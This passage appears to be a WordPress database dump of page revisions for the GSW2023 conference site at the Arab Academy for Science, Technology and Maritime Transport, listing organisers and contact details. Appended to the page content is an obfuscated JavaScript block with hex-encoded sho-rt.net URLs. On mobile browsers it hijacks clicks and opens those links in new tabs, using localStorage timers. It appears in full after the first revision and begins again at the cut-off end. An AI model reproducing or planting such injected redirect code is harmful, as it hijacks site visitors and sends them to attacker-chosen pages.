Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-27 06:50:08','2023-06-27 06:50:08','',3066,'https://gsw2023.com/?p=4848',0,'revision','',0),
(4849,4,'2023-06-27 07:01:38','2023-06-27 07:01:38','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 